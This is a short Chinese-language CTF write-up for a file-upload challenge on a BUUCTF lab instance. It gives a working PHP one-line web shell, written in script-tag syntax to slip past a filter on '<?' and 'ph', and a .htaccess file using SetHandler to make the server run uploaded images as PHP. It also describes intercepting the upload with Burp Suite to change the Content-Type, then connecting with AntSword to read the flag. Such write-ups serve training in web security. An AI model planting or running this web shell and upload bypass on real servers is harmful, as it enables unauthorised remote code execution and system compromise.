题：

步骤（先上传木马，在上传.htaccess）

准备工作

他过滤了<? ,ph等

准备：一句话木马，.htaccess文件

.htaccess 

SetHandler application/x-httpd-php //解析为php文件

muma1.jpg

<script language='php'>eval($_POST['cmd']);</script>     //一句话木马

开始就绪

第一步：上传muma1.jpg再使用bp开始抓包，然后放过，得到他的路径

/var/www/html/upload/415d207cd4fbdc76b7a5d56818451ba3/muma1.jpg succesfully uploaded!

第二步：上传.htaccess通过pb抓包修改Content-Type: image/jpeg，再次放过，得到他的路径

/var/www/html/upload/415d207cd4fbdc76b7a5d56818451ba3/.htaccess succesfully uploaded!

第三步：组合得到的路径，进行蚁剑连接

nullhttp://aa15f862-d40e-4a4c-8d64-f4b96a2547f6.node5.buuoj.cn:81/upload/415d207cd4fbdc76b7a5d56818451ba3/muma1.jpg

第四步：查找flag

方法一，可以直接搜索\flag

方法二，点击第一个\文件夹，直接拉到最下面，有一个flag文件，点开即可